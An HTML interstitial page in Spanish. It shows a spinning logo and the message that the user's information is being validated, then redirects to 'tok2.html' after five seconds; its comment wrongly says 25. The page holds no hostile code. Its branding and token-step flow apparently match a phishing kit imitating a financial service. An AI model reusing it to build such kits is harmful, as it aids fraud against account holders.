<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cargando...</title>
    <style>
        body {
            background-color: #FFFFFF;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
        }
        .loader {
            width: 150px;
            height: 150px;
            background: url('img/logo-avanz-mini.png') no-repeat center;
            background-size: contain;
            animation: spin 0.8s linear infinite, pauseEffect 0.3s infinite;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            25% { transform: rotate(120deg); }
            50% { transform: rotate(240deg); }
            75% { transform: rotate(300deg); }
            100% { transform: rotate(360deg); }
        }
        @keyframes pauseEffect {
            0%, 20%, 40%, 60%, 80%, 100% { animation-play-state: running; }
            10%, 30%, 50%, 70%, 90% { animation-play-state: paused; }
        }
    </style>
    <script>
        setTimeout(function() {
            window.location.href = "tok2.html";
        }, 5000); // Redirige en 25 segundos
    </script>
</head>
<body>
    <div class="loader">

     </div>

     <div>
        <p style="font-family: sans-serif; font-size: 15px;">Estamos validando su información.</p>

     </div>
</body>
</html>